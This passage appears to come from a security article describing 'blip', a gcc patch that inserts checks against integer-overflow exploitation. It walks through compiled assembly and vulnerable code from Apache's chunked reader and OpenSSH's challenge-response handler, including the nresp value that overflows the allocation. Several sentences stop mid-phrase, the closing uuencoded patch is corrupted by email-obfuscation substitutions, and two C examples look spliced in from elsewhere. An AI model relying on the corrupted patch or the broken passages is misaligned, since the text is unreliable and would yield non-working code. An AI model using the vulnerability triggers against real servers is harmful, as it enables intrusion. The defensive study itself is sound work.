	movl	28(%edi), %eax
	movl	%eax, 8(%esp)
	call	read_with_errors
	movl	%eax, %esi
	cmpl	$-1, %eax
	jne	.L86
	cmpl	$0, -16(%ebp)
	setne	%al
	movzbl	%al, %eax
	decl	%eax
	orl	-16(%ebp), %eax
	jmp	.L67
	movl	%eax, 8(%edi)
	cmpl	%ebx, %eax
	jle	.L88
	movl	%ebx, %esi
	cmpl	$268435456, %esi          ------------------------
	jbe	.L89
	movl	%esi, (%esp)               Blip check (using esi)
	call	__blip_violation
	jmp	.L90                      ------------------------
	movl	4(%edi), %eax
	movl	12(%ebp), %edx
	movl	%edx, (%esp)
	movl	%eax, 4(%esp)
	movl	%esi, 8(%esp)
	call	memcpy
	subl	%esi, 8(%edi)
	addl	%esi, 4(%edi)
	movl	-16(%ebp), %eax
	addl	%esi, %eax
	movl	-12(%ebp), %ebx
	movl	-8(%ebp), %esi
	movl	-4(%ebp), %edi
	movl	%ebp, %esp
	popl	%ebp

One can notice that before any call to the memcpy function (which is one 
of the "loop like" functions), a little code was added which calls 
__blip_violation in the case the 3rd parameter of memcpy is bigger than 

Another thing worth mentioning is the way the injected check accesses 
this 3rd parameter. In the first block of injected code the parameter is 
held in the esi register, in the second block it is held in the ebx 
register, and in the third block it is stored on the stack at ebp-16. 
The reason is simple: the modification of the code was done on the AST 
tree, and the patch used the exact same tree node that was used in the 
call expression to memcpy, so the RTL generated the same code for both 
the call expression and the check expression. 

Now let's go back to the ap_bread function, and let's assume that 
CHARSET_EBCDIC was indeed defined. In that case the ascii2ebcdic function 
would have been the one with the "vulnerable" loop. Therefore we hope 
that the blip patch would check the loop in that function as well.

The following is the ascii2ebcdic code taken from src/ap/ap_ebcdic.c:

API_EXPORT(void *)
ascii2ebcdic(void *dest, const void *srce, size_t count)
{
    unsigned char *udest = dest;
    const unsigned char *usrce = srce;

    while (count-- != 0) {
        *udest++ = os_toebcdic[*usrce++];
    }

    return dest;
}

Result of compiling the above function with -fblip:

	.type	ascii2ebcdic,@function
	pushl	%ebp
	movl	%esp, %ebp
	pushl	%edi
	pushl	%esi
	pushl	%ebx
	subl	$12, %esp
	movl	16(%ebp), %ebx
	movl	8(%ebp), %edi
	movl	12(%ebp), %esi
	cmpl	$0, %ebx            -------------------
	jbe	.L12
	cmpl	$268435456, %ebx
	jbe	.L12                   Blip check
	movl	%ebx, (%esp)
	call	__blip_violation
.L12:                            -------------------
	decl	%ebx
	cmpl	$-1, %ebx
	je	.L18
	movzbl	(%esi), %eax
	movzbl	os_toebcdic(%eax), %eax
	movb	%al, (%edi)
	incl	%esi
	incl	%edi
	decl	%ebx
	cmpl	$-1, %ebx
	jne	.L16
	movl	8(%ebp), %eax
	addl	$12, %esp
	popl	%ebx	
	popl	%esi
	popl	%edi
	popl	%ebp

While processing the ascii2ebcdic function, the blip patch identified the 
while loop as a count-loop. The loop condition supplies all the 
information required to create a <blip_check>. First we identify the 
variables of the loop. In this case "count" is one variable and the 
constant "0" is the second one. Looking for variable modification, we can 
see that "count" is decremented in the expression "count--". Since 
"count" is the only modified variable, we can say that "count" is the 
count-variable and the constant 0 is the limit-variable. We can also say 
that the loop is a decrement-loop, since the modification operation is 
"--". The check therefore will be 
(count > limit && count - limit > MAX_BLIP). Looking at the above 
assembly code, we can see that the loop count is stored in the ebx 
register. (It is easy to spot this by looking at the code below label 12 
(L12), which represents the while condition: it first decrements ebx and 
then compares it with the loop constant.) The <blip_check> therefore 
uses the ebx register for the check.
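
The two checks described in this section can be modelled in a few lines of C. This is an added example, not code from the blip patch or from Apache: the function names (clamp_len, blip_call_check, blip_dec_loop_check, validated_len) and the sample inputs are assumptions, and MAX_BLIP is set to the 268435456 constant visible in the listings.

```c
#include <stdint.h>
#include <stdio.h>

/* Threshold visible in the listings as "cmpl $268435456" (0x10000000). */
#define MAX_BLIP 268435456u

/* Line 03 of the ap_get_client_block() listing: a signed "min" clamp.
 * A negative remaining is not greater than bufsiz, so it passes through. */
static int32_t clamp_len(int32_t remaining, int32_t bufsiz)
{
    return (remaining > bufsiz) ? bufsiz : remaining;
}

/* Check emitted before a loop-like call such as memcpy: the size argument
 * is compared unsigned (cmpl + jbe). Returns 1 where the compiled code
 * would call __blip_violation. */
static int blip_call_check(int32_t nbyte)
{
    return (uint32_t)nbyte > MAX_BLIP;
}

/* Check for a decrement count-loop such as "while (count-- != 0)":
 * (count > limit && count - limit > MAX_BLIP). */
static int blip_dec_loop_check(uint32_t count, uint32_t limit)
{
    return count > limit && count - limit > MAX_BLIP;
}

/* Source-level validation (assumed hardening, not Apache's actual fix):
 * refuse a negative length before it reaches any copy.
 * Returns -1 on reject, otherwise the clamped length. */
static int32_t validated_len(int32_t remaining, int32_t bufsiz)
{
    if (remaining < 0 || bufsiz <= 0)
        return -1;
    return (remaining > bufsiz) ? bufsiz : remaining;
}

int main(void)
{
    /* Constructed inputs: two normal chunk sizes and two negative ones. */
    const int32_t samples[] = { 512, 100000, -1, INT32_MIN };
    const int32_t bufsiz = 8192;
    size_t k;

    for (k = 0; k < sizeof samples / sizeof samples[0]; k++) {
        int32_t n = clamp_len(samples[k], bufsiz);
        printf("remaining=%11ld clamp=%11ld as size=%10lu call_check=%d "
               "loop_check=%d validated=%ld\n",
               (long)samples[k], (long)n, (unsigned long)(uint32_t)n,
               blip_call_check(n), blip_dec_loop_check((uint32_t)n, 0),
               (long)validated_len(samples[k], bufsiz));
    }
    return 0;
}
```

Every negative 32-bit value converts to at least 0x80000000 when treated as a size, which is above the threshold, so both the call check and the loop check fire for any negative chunk length that survives the clamp.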

----[ 7.2 - OpenSSH auth

--[ Vulnerability info	

The OpenSSH Vulnerability is an example of an integer overflow bug, which 
results in a miscalculated allocation size. The following is a snippet of 
the vulnerable code:

OpenSSH auth2-chall.c : input_userauth_info_response()

01 nresp = packet_get_int();

<some code here ..>

02 response = xmalloc(nresp * sizeof(char*));
03 for(i = 0; i < nresp; i++)
04	response[i] = packet_get_string(NULL);

At line 01 the code reads an integer into an unsigned variable. Later the 
code allocates an array with nresp entries. The problem is that nresp * 
sizeof(char*) is an expression that may overflow. Therefore sending nresp 
bigger than 0x40000000 allows allocation of a small buffer that can be 
later overflowed by the assignment in line 04.

--[ Testing the patch

To compile the OpenSSH package with -fblip enabled, one may add -fblip 
to the CFLAGS definition at (i.e. [email protected]@ -

Any attempt to send a large number of responses after compiling OpenSSH 
with the blip patch will end up with OpenSSH executing the 

The following is a snippet of the vulnerable function:

static void
input_userauth_info_response(int type, u_int32_t seq, void *ctxt)
{
	Authctxt *authctxt = ctxt;
	KbdintAuthctxt *kbdintctxt;
	int i, authenticated = 0, res, len;
	u_int nresp;
	char **response = NULL, *method;

	<omitted code>

	nresp = packet_get_int();

	if (nresp != kbdintctxt->nreq)
		fatal("input_userauth_info_response: wrong number of 

	if (nresp > 0) {
		/* **  Vulnerable code ** */

		response = xmalloc(nresp * sizeof(char*));
		for (i = 0; i < nresp; i++)
			response[i] = packet_get_string(NULL);
	}

	<omitted code>
}

The above function is translated to the following assembly code when 
compiled with the -fblip protection. (To keep the blip modification 
readable, the code was compiled using -O instead of -O2, which would 
reorder basic blocks.)

	.type	input_userauth_info_response,@function

	movl	-16(%ebp), %eax
	movl	$0, 4(%eax)
	call	packet_get_int
	movl	%eax, %esi
	movl	-20(%ebp), %edx
	cmpl	12(%edx), %eax
	je	.L111
	movl	$.LC15, (%esp)
	call	fatal
	testl	%esi, %esi
	je	.L113
	leal	0(,%esi,4), %eax
	movl	%eax, (%esp)
	call	xmalloc
	movl	%eax, -32(%ebp)
	movl	$0, %ebx
	cmpl	$0, %esi
	jbe	.L115
	cmpl	$268435456, %esi          ------------------------
	jbe	.L115
	movl	%esi, (%esp)                   Blip Check
	call	__blip_violation
.L115:                                 ------------------------
	cmpl	%esi, %ebx
	jae	.L113
	movl	$0, (%esp)
	call	packet_get_string
	movl	-32(%ebp), %ecx
	movl	%eax, (%ecx,%ebx,4)
	incl	%ebx
	cmpl	%esi, %ebx
	jb	.L120

The blip patch identified the for-loop as a count-loop and injected code 
that directs the flow to the __blip_violation handler when the limit 
(i.e. nresp) is bigger than BLIP_MAX. Therefore, if the nresp value is 
high enough to trigger an overflow in the call to xmalloc, it is also 
high enough to get caught by the <blip_check>.
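
The OpenSSH case above and the xdr_array limitation from section 4 can be compared side by side with 32-bit arithmetic. This is an added example, not code from the blip patch, OpenSSH or the xdr library: the function names are assumptions, the increment-loop check is written as the mirror of the decrement form given for ascii2ebcdic, and the two-input values are constructed to show the pattern rather than taken from the real xdr_array bug.

```c
#include <stdint.h>
#include <stdio.h>

/* Threshold visible in the listings as "cmpl $268435456" (0x10000000). */
#define MAX_BLIP 268435456u

/* 32-bit size arithmetic, as on the IA-32 target of the listings:
 * the product silently wraps modulo 2^32. */
static uint32_t alloc_size32(uint32_t count, uint32_t elsize)
{
    return count * elsize;
}

/* Check for an increment count-loop "for (i = start; i < limit; i++)":
 * (limit > start && limit - start > MAX_BLIP). */
static int blip_inc_loop_check(uint32_t start, uint32_t limit)
{
    return limit > start && limit - start > MAX_BLIP;
}

/* Validation on the allocation expression itself:
 * true when count * elsize does not fit in 32 bits. */
static int mul_overflows32(uint32_t count, uint32_t elsize)
{
    return elsize != 0 && count > UINT32_MAX / elsize;
}

struct verdict {
    uint32_t alloc;   /* size actually passed to the allocator */
    int wrapped;      /* 1 if the multiplication overflowed    */
    int blip_fires;   /* 1 if the loop check would trigger     */
};

static struct verdict analyse(uint32_t count, uint32_t elsize)
{
    struct verdict v;
    v.alloc = alloc_size32(count, elsize);
    v.wrapped = mul_overflows32(count, elsize);
    v.blip_fires = blip_inc_loop_check(0, count);
    return v;
}

int main(void)
{
    /* Constructed inputs. sizeof(char*) is 4 on the IA-32 target,
     * matching "leal 0(,%esi,4)" in the listing. */
    static const struct {
        const char *name;
        uint32_t count, elsize;
    } cases[] = {
        { "benign",                 16u,         4u       },
        { "OpenSSH nresp",          0x40000001u, 4u       },
        { "two inputs (xdr-like)",  0x10000u,    0x10001u },
    };
    size_t k;

    for (k = 0; k < sizeof cases / sizeof cases[0]; k++) {
        struct verdict v = analyse(cases[k].count, cases[k].elsize);
        printf("%-22s count=0x%08lx elsize=0x%08lx alloc=0x%08lx "
               "wrapped=%d blip_fires=%d\n",
               cases[k].name, (unsigned long)cases[k].count,
               (unsigned long)cases[k].elsize, (unsigned long)v.alloc,
               v.wrapped, v.blip_fires);
    }
    return 0;
}
```

In the two-input row the allocation has wrapped but the loop bound stays under the threshold, so only an overflow check on the multiplication itself catches it.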

--[ 8 - Appendix B - Using blip  

To enable the blip patch one should first add the -fblip flag when 
executing the gcc compiler. 

The blip patch will attempt to emit the <blip_check> whenever it seems 
possible to do so. The patch will silently ignore all loops or calls 
that cannot be protected. To see the ignored loops, one can use one of 
the following warning flags, which also provide a message describing the 
reason for ignoring the specific loop.

Warning flags:
- blip_for_not_emit - report ignored for loops.
- blip_while_not_emit - report ignored while loops.
- blip_call_not_emit - report ignored calls to loop-like functions.

The reason for ignoring a loop will be one of the following:
- Loop variables are less than 4 bytes long
- for init is not an expression
- call to function is made using a pointer to function
- call parameters have side effects. Reusing the expression may cause 
unexpected results
- loop condition is too complex in order to find the loop variables
- none of the loop variables is modified (not enough info to make check)
- both loop variables are modified
- condition is too complex

The blip patch is also capable of reporting check statistics. Using the 
-fblip_stat flag, one can make the blip patch print out statistical 
information about the number of loops processed and the number of loops 
that were successfully checked. 

The following command line will compile the first sample code. The output 
of the compilation follows:

$ gcc -o sample -fblip -fblip_stat -O sample.c

-=] Blip statistics (checks emits)
Total:	1/100%		1/100%
for:	1/100%		1/100%
while:	0/0%		0/0%
calls:	0/0%		0/0%
-=] End Blip Statistics

begin 640 blip.patch
M;"A44D5%7T]015)[email protected]*&]P+#`I*3L-#0HK"0D)#0T**PD)[email protected]:[email protected]%S
M92!L;V]P('9A<B!N965D(&-O;G9E<G1I;VXL('=E('=I;&[email protected]"!S;VUE
M(`T-"BL)"2`J(&YO<"!E>'!R97-S:6]N<R`J+PT-"BL)"6-A<[email protected]]07T58
M<[email protected]<%]F:6YD7V1E8VPH5%)%15]/4$5204Y$("AO<"PP*2D[#0T**PD)
M#0HK#0T**R\J(&QO;[email protected]:6YS:61E(&[email protected]%,3%]%6%!2+"!A;[email protected]"!T
M:&[email protected];[email protected];F%[email protected]=&AE;B!S96%[email protected]@#0T**R`J(&9U;F-T:6]N
M(&YA;[email protected]:[email protected]<"!L:7-T+"!A;[email protected])E871E(&[email protected](FQO;W!?;&EM:70B
M('-T=7)C="!U<VEN9PT-"[email protected]*B!T:&[email protected]:"!P87)A;2!A<R!L:6UI="[email protected]
M8V]N<W1A;[email protected],"!A<R!C;W5N=&5R+"!A;[email protected]<V5T(&1I<F5C=&EO;B`-#0HK
M("[email protected]=&\@:6YC<F5M96YT+B`J+PT-"BMB;V]L#0T**V)L:7!?9FEN9%]C86QL
M*PEI;G0)"6DL<&%R86U?:[email protected]]+3$[#0T**PT-"BL)[email protected]=7!D871E('-T
[email protected]%L;"!\?`T-"BL)"2%44D5%7T]015)!3D0H8V%L;"PP*7Q\#0T**PD)
M5%)%15]#3T1%("A44D5%7T]015)[email protected]*&-A;&PL,"DI("$]($%$1%)?15A0
M+#`I*7L-#0HK"0D-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#[email protected]
M8V%L;"!E>'!R(&1O;[email protected]:&%V92!A9&1R97-S(&5X<'(B*3L)#0T**PD)<F5T
M0TQ?3D%-12`H9G5N8U]D96-L*2!\?`T-"BL)"[email protected]%3E1)1DE%4E]03TE.
M87)N:6YG*$Y%7T-!3$PL(F)L:7`Z(&-A;&[email protected]@<&]I;G1E<B!T;R!F=6YC
M=&EO;B!N;[email protected]<W5P<&]R=&5D(BD[#0T**[email protected]("`)<F5T=7)N(&9A;'-E.PT-
M72YF=6YC7VYA;64I(#[email protected],#MI*RLI>PT-"BL)"6EF*'-T<F-M<"A)1$5.5$E&
M<F%M7VEN9&5X(#[email protected];&]O<%]L:6ME<UMI72YP87)A;5]I;F1E>#L-#0HK"0D)
M;[email protected]]U;[email protected]:[email protected];&]O<%]L:6ME<R!L:7-T('[email protected]&]N="!C;W5N=`T-
M"BL)("[email protected]:[email protected]:[email protected]=&AE(&)L:7!?<W1A="`J+PT-"BL):68H<&%R86U?:6YD
[email protected]@/"`P*7L-#0HK"0EB;&EP7W-T870N=&]T86Q?8VAE8VMS+2T[#0T**PD)
M/3`[(&[email protected]/"!P87)A;5]I;F1E>"`F)B!P87)A;[email protected]:2LK*7L-#0HK"0EP87)A
M;2`](%[email protected]*'!A<F%M*3L-#0HK"7T-#0HK"0T-"BL):68H(7!A
M<F%M*2!R971U<[email protected]%L<V4[#0T**PD-#0HK"6QO;W!?;&EM:70N;&EM:[email protected]
M/2!44D5%7U9!3%5%("AP87)A;2D[#0T**PT-"BL)[email protected]:[email protected]<&%[email protected]:7,@
M8V%L8W5L871E9"!U<VEN9R!A(&9U;F-T:6]N+"!D;VYT(&EN8VQU9&[email protected]=&AA
M=`T-"BL)("[email protected]<B!I;B!T:&[email protected](&ET<[email protected]=&]O(')I<VMY
M:70I*7L-#0HK"0EB;&EP7W=A<FYI;F<H3D5?0T%,3"PB8FQI<#[email protected]<&%[email protected]
M<V5E;7,@=&\@:&%V92!S:61E(&5F9F5C=',B*3L-#0HK"0ER971U<[email protected]%L
M<V4["0D-#0HK"7T-#0HK"0T-"BL);&]O<%]L:6UI="YC;W5N=&5R(#[email protected]:6YT
M96=E<E]Z97)O7VYO9&4[#0T**R`@"6QO;W!?;&EM:70N9&ER(#[email protected]#4D5-
M14Y4.PD-#0HK"0T-"BL)[email protected]('-E96US('1O(&)E(&]K+"!W92!F;W5N
M9"!T:&[email protected];&EM:71S+"!A;[email protected][email protected]%N(`T-"BL)("[email protected]]N=&[email protected]=VET
M<G5E.PT-"BM]#0T**PT-"BL-#[email protected]&]O:R!I;G-I9&[email protected]!L;V]P(&-O
M;F1I=&EO;[email protected]<[email protected]@:[email protected]]N9&ET:6]N(&ES('1O;R`-#0HK
M("[email protected]]M<&QI8V%T960N(&EF(&ET(&ES+"!R971U<[email protected],3"`O+R!&25A-
[email protected](F-O;7!L:6-A=&5D(B!S970-#0HK("H-#0HK("[email protected]]R(&5A
[email protected]@9&5C;"!I;B!T:&[email protected]]N9&ET:6]N+"!C:&5C:R!I9B!D96-L(&ES(&UO
M9&EF:65D(&5I=&AE<@T-"[email protected]*B!I;B!C;VYD(&]R(&5X<'(N(&EF(&ET)W,@
M;6]D:[email protected]]N<VED97(@:[email protected],@=&AE(&-O=6YT97(N#0T**R`J(&EF
M(&UO<[email protected]=&AE;B!O;[email protected]]U;G1E<B!F;W5N9"!R971U<[email protected],3"[email protected]*B\-
M*[email protected]]N9"[email protected]<F5T=7)N(&9A;'-E.PT-"BL)#0T**PDO*B!F:7)S="!V
M97)S:6]N('=I;&[email protected]<W5P<&]R="!O;FQY('9E<[email protected]<VEM<&QE(&-O;F1I=&EO
M;G,@*B\)#0T**[email protected]%)%15]#3T1%("AC;VYD*2E[#0T**PD)8V%S
M92!,5%]%6%[email protected]"BL)"6-A<[email protected]$5?15A04CH-#0HK"0EC87-E($=%7T58
M4%(Z#0T**PD)8V%S92!'5%]%6%[email protected]"BL)"6-A<[email protected]%?15A04CH-#0HK
M"0EC87-E($Y%7T584%(Z#0T**PT-"BL)"0DO*B!F:6YD(&[email protected]=VEL;"!G
[email protected]@;W!E<F%N9"!A;[email protected]<F5T=7)N('1H92`B;6%I;B(-#0HK"0D)("[email protected]
M9&5C;"!T:&%T(')E<')E<[email protected]:70N(`T-"BL)"[email protected]*B`-#0HK"0D)("[email protected]
[email protected]=&AI<R!O<&5R86YD(&ES('!A<[email protected];[email protected]=VAA="!W92!H;W!E(&[email protected]]U
M;G1E<@T-"BL)"[email protected]*B!C;VYD:71I;VXL(&ET<R!G;VEN9R!T;R!B92!E:71H
M97(@=F%R+W!A<F%M(&[email protected];W(@#0T**PD)"2`J(&%N(&5X<'(@[email protected]@
M;W5R(')E<75E<W1E9"!D96-L(&ES('!A<[email protected];V8N("HO#0T**PD)#0T**PT-
M"BL)"0EF;W(H:3TP.R!I(#[email protected],[email protected]:2LK*7L-#0HK"0D-#0HK"0D)"[email protected]
M/2!B;&EP7V9I;F1?9&5C;"A44D5%7T]015)[email protected]*&-O;F0L:2DI.PD)"0T-
M14-++`T-"BL)"0D)"0D)(F)L:7`Z(&-A;[email protected]"!L;V]P(&[email protected]:[email protected]
M8V]N9&ET:6]N(BD[#0T**PD)"0D)[email protected]]N9&ET:6]N('1O;R!C;VUP;&5X
M+"!R971U<[email protected]*B\-#0HK"0D)"0ER971U<[email protected]%L<V4[#0T**PD)"0E]#0T*
M*PT-"BL)"0D)[email protected]@:[email protected]&5C;"!I<R!M;V1I9FEE9"[email protected][email protected]:&]P
M92!T;[email protected]"BL)"0D)("[email protected];6]D:69I8V%T:6]N('[email protected]@87,@:6YC
M<F5M96YT(&]R(&1E8W)E;65N=`T-"BL)"0D)("[email protected]<[email protected][email protected]:&%V92!T
M7VUO9&EF:65D*RL[#0T**PD)"0D);&]O<%]L:6UI="YC;W5N=&5R(#[email protected]&5C
M;#L-#0HK"0D)#0T**PD)"0D)#0T**PD)"0E]#0T**PD)"0DO*B!I9B!N;[email protected]
M;6]D:[email protected];6%[email protected]:71S('1H92!L:6UI="`N<V%V92!I="`-#0HK"0D)
M"2`J(&EN(&-A<[email protected]=&AA="!W92!W:6QL(&9I;[email protected];W1H97(@87,@8V]U;G1E
M<B`J+PT-"BL)"0D)96QS97L-#0HK"0D)"0EL;V]P7VQI;6ET+FQI;6ET(#[email protected]
M*PD)"0T-"BL)"0DO*B!W92!D:61N="!F;W5N9"!O;[email protected]*&%N9"!O;FQY(&]N
[email protected];6]D:[email protected]&5C;"[email protected]#0T**PD)"2`J('-O('=E(&1O;[email protected]:VYO=R!W
M:&EC:"!I<R!T:&[email protected];&EM:[email protected]*&EF(&%T(&%L;"!E>&ES="[email protected]*B\-#0HK"0D)
M9&EF:65D/R`H8F]D>2!N;[email protected]<V5A<F-H960I(BD[#0T**PD)"7T-#0HK"0D)
M"2)B;&EP.B!M;W)E('[email protected];VYE('9A<B!I<R!M;V1I9FEE9"[email protected]=VAO(&ES
M(&-O=6YT97(_(BD[#0T**PD)"0D-#0HK"0D)?0T-"BL)"0ER971U<[email protected]%L
M;FEN9RA314Q&7T-(14-++`T-"BL)"0D)"2)B;&EP.B!C;VYD:71I;[email protected]:7,@
M=&]O(&-O;[email protected]@9F]R('1H:7,@=F5R<VEO;B(I.PT-"BL)"0ER971U<[email protected]
M<B!L;V]P(&QI;6ET<[email protected]:[email protected];&]O<"!S965M<R!T;R!B92!A(&-O=6YT(&QO
M;W`L(`T-"[email protected]*B!E;6ET(&-O9&[email protected]=&\@[email protected];&]O<"!C;W5N=&5R(&EN
M(')U;BUT:6UE+B!T:&%T(&-O9&[email protected]=VEL;`T-"[email protected]*B!M86ME('-U<[email protected]=&AE
M(&-O=6YT97(@:7,@;F]T('1O;R!B:6<@*&%S(')E<W5L="!O9B!I;[email protected];W9E
M<F9L;W<-#0HK("[email protected];&]I=&%T:6]N*2`J+PT-"BL-#0HK("`@#0T**W1R
M964-#0HK8FQI<%]C:&5C:U]L;V]P7VQI;6ET("AT*0T-"[email protected]("`@('[email protected]
M=#L-#0HK>PT-"BL)[email protected]&]O<"!P87)T<R`J+PT-"BL)=')E90ER97-U;'0]
M=#L-#0HK#0T**PDO*B!)9B!W92!A<[email protected];F]T(&%S:V5D('1O(&)L:7`L(')E
M='5R;B!T:&[email protected]=')E92!W92!G;[email protected]*B\-#0HK"6EF*"%F;&%G7V)L:7`I(')E
M='5R;B!R97-U;'0[#0T**PT-"BL)[email protected]@=&AE('[email protected][email protected]]T(&ES
M(&YU;&[email protected]=&AE;B!W92!C86YT(&1O(&[email protected]@*B\-#0HK"6EF*"%T*0ER971U
M<[email protected]<F5S=6QT.PT-"BL-#0HK"2\J(&EN:71I86QI>[email protected];&]O<%]L:6UI="!G
M;&][email protected]*B\-#0HK"6QO;W!?;&EM:70N<W1M="`]('0[#0T**PEL;V]P7VQI
M"0T-"BL)#0T**[email protected]%)%15]#3T1%("AT*2E[#0T**PD-#0HK"2\J
M(&1E<&5N9&EN9R!O9B!L;V]P('1Y<&4L(&5X=')[email protected]=&AE(&QO;W`@<W1M
M=',@86YD(&5X<')S#0T**[email protected]*B!L;V]P(&-O;F1I=&EO;B!W:6QL(&AE;'`@
M=7,@:61E;[email protected]=&AE(&QO;W`@8V]U;G1E<B!V87(-#0HK"2`J('=E('=I
M;&[email protected];&%T97(@;&]O:R!I;B!C;VYD(&ET<V5L9B!A;[email protected]=&AE(&9O<E]E>'!R
M;[email protected]#0T**[email protected]*@T-"BL)("[email protected]:[email protected];6]D:69I8V%T:6]N(&9O=6YD(&%N9"!L
M;V]K(&QI:[email protected]`B8V]U;G0B(&UO9&EF:6-A=&EO;B`-#0HK"2`J("AI+F4N
M("LK+"TM+"L]+"H][email protected]*2!W92!W:6QL(&MN;W<@:71S(&[email protected](F-O=6YT
M(B!L;V][email protected]"BL)("[email protected]"0T-"BL)("[email protected];F5X="!S=&5P+"!I<R!T;R!I9&5N
M=&EF>2!C;VYD:71I;[email protected]<F5S:6]N+B!A;[email protected]=&\@96UI=`T-"BL)("[email protected]
M8V]D92!T;R!C:&5C:R!L:6UI="!I;B!R=6YT:6UE+"!B969O<[email protected];&]O<"!S
M=&%R="!E>&5U8W1I;[email protected]("HO#0T**PT-"BL)8V%S92!&3U)?4U1-5#H-#0HK
M"0D)?0T-"BL-#0HK"0EB<F5A:SL-#0HK"6-A<[email protected])3$5?4U1-5#H-#0HK
M*%=(24Q%7T-/[email protected]*'0I+$Y53$Q?5%)%12DI#0T**PD)"6EF*&)L:7!?96UI
M=%]W:&EL95]L;V]P7V-H96-K<[email protected]*7L-#0HK"0D)"6)L:7!?<W1A="YT;W1A
M04Y$("AT+#$I*2D-#0HK"0D)<F5S=6QT(#[email protected]<%]E;6ET7V-A;&Q?8VAE
M#0T**PD)<F5T=7)N(')E<W5L=#L-#0HK"7T-#0HK#0T**PER971U<[email protected]<F5S
M(&=C8RTS+C(M8FQI<"]G8V,O8FQI<"YH#[email protected]+3,N,B]G8V,O8FQI
M<"YH"5=E9"!$96,@,[email protected],38Z,#`Z,#`@,3DV.0T**RLK(&=C8RTS+C(M8FQI
M<"]G8V,O8FQI<"YH"4UO;B!$96,@(#(@,3DZ-#(Z,[email protected],C`P,@T*0$`@+3`L
M=&EO;B`M($$N2RY!(")B;&EP(@T**PT**PEB;&EP(&ES(&[email protected]<&%[email protected]@9F]R
M('1H92!G8V,@8V]M<&EL97(L('=H:6-H(&1E=&5C="!T:&[email protected];&]I=&%T
M:6]N#0HK"6]F("AP=6)L:6-L>[email protected]=6YK;F]W;B!I;G1E9V5R(&]V97)F;&]W
M(&%N9"!S:6=N('9U;&YE<F%B:6QI=&EE<RX-"BL-"[email protected]("`-"BM4:&ES(&9I
M;&[email protected]:7,@<&%R="!O9B!'[email protected],N#0HK#0HK1TY5($-#(&ES(&[email protected]<V]F
M='=A<F4[('[email protected]<F5D:7-T<FEB=71E(&ET(&%N9"]O<B!M;V1I9GD-
M"BMI="!U;F1E<B!T:&[email protected]=&5R;7,@;[email protected]=&AE($=.52!'96YE<F%L(%!U8FQI
M=&EO;BD-"BMA;[email protected];&%T97(@=F5R<VEO;BX-"BL-"BM'[email protected],@:7,@9&ES
M=')[email protected]:[email protected]=&AE(&AO<&[email protected]=&AA="!I="!W:6QL(&)E('5S969U;"P-
M"BL)8G5T(%=)5$A/[email protected](%=!4E)!3E19.R!W:71H;W5T(&[email protected]=&AE
M(&EM<&[email protected]=V%R<F%N='[email protected];V8-"BL)34520TA!3E1!0DE,2519(&]R($9)
M5$Y%4U,@1D]2([email protected]$%25$E#54Q!4B!055)03U-%+B`@4V5E('1H90T**PE'
[email protected])A;"!0=6)L:6,@3&EC96YS92!F;W(@;6]R92!D971A:[email protected]*
M*PT**PE9;[email protected]<VAO=6QD(&[email protected]<[email protected]!C;W!Y(&]F('1H92!'
[email protected])A;"!0=6)L:6,@3&EC96YS90T**PEA;&]N9R!W:71H($=.52!#
[email protected]<V5E('1H92!F:6QE($-/4%E)3D<N("!)9B!N;W0L('=R:71E('1O#0HK
M("`J+PT**PT**R-D969I;[email protected])4%][email protected]),'@Q,#`P,#`P,"`O*B`[email protected]
M9&5F(&[email protected];&]O<%]D:7(-"BM[#0HK"55.2TY/5TY?1$E2+"\J('=E(&-A
M;FYO="!T96QL(&QO;W`@9&ER96-T:6]N("HO#0HK"4E.0U)%345.5"P)[email protected]
M;&]O<"!I<R!G;VEN9R!U<"`J+PT**PE$14-214U%3E0)[email protected];&]O<"!I<R!G
M;VEN9R!D;W=N("HO#0HK?0T**VQO;W!?9&ER.PT**PT**W1Y<&[email protected]
M:&[email protected]%)%[email protected]"[email protected]=&AE(')I9VAT#0HK"0D)"2`@('=A
M(&-H96-K(&9O<B!F;W(@;&]O<',@*B\-"BL)3D5?5TA)3$4L"2\J('=A<[email protected]
M;F]T(&5M:71I;F<@[email protected]]R('=H:6QE(&QO;W!S("HO#0HK"4Y%7T-!
M3$P)"2\J('=A<[email protected];F]T(&5M:71I;F<@[email protected]]R(&-A;&QS("HO#0HK
M?0T**V)L:7!?=V%R;FEN9W,[#0HK#0HK='EP961E9B!S=')[email protected];W!?
M8W,@<W1R=6-T=7)E+"!W:6QL(&UA:6YT86EN('1H92!A;6]U;[email protected];[email protected]
M;W5T97)D(`T**R`J(&-O9&[email protected]=&AA="!M:6=H="!H879E(&YE961E9"!A(&)L
M:7`@8VAE8VLL(&%N9"!T:&[email protected]<F5A;"!A;6]U;[email protected];[email protected]#0HK("[email protected]=&EM97,@
M=&AA="!A(&)L:7`@[email protected]=V%S(&5M:71E9"[email protected]*B\-"BMT>7!E9&5F('-T
M7W-T871I<W1I8W-?<SL-"BL-"BLO*B!.54Q,('1E<FUI;F%[email protected];&ES="!O
M9B!F=6YC=&EO;B!W:&EC:"!A<[email protected];W-T('1H92!S86UE(&%S(&[email protected]#0HK
M("[email protected];&]O<"[email protected]:2YE(&UE;6-P>[email protected];65M;6]V92XN(&9O<B!E86-H(&9U;F-T
M:6]N('=E('=I;&[email protected]<V%V92!T:&[email protected]#0HK("[email protected];F%M92!O9B!T:&[email protected]
M;[email protected],@=V5L;"!A<R!T:&[email protected],"!B87-E9"!I;F1E>"!T;R!T:&[email protected]<&%[email protected]
M#0HK("[email protected][email protected]@:7,@<W5P<&]S92!T;R!H879E('1H92!L96YG=&@@=F%R
M:6%B;&[email protected]*B\-"BL-"BMT>7!E9&5F('-T<G5C="!?;&]O<%]L:6ME7W-[#0HK
M"6-H87()"0EF=6YC7VYA;65;,C4V73L-"BL)=6YS:[email protected]:6YT"7!A<F%M
M7V1E8VQ?;6]D:[email protected]("`@("`@("!005)!35,@*"AT<F5E+'1R964I*3L-
M4R`H*'1R964L=')E92DI.PT**V)O;[email protected]<%]F:6YD7V-A;&Q?;&EM:71S
M;[email protected]<%]E;6ET7W=H:6QE7VQO;W!?8VAE8VMS("`@(%!!4D%-4R`H*'9O
M;[email protected]("`@("!005)!35,@*"AT<F5E*2D[#0HK=')E92!B;&EP7V)U:6QD7V-H
M9W,L8V]N<[email protected]<BHI*3L-"[email protected]+4YU<B!G8V,M,RXR+V=C8R]C+6]B
M,#HT.3HU."`R,#`R#0HK*[email protected]+3,N,BUB;&EP+V=C8R]C+6]B:F,M8V]M
M.2!`0`T*("`@:[email protected]*&QO;VMU<%]A='1R:6)U=&[email protected]*")A;'=A>7-?:6YL:6YE
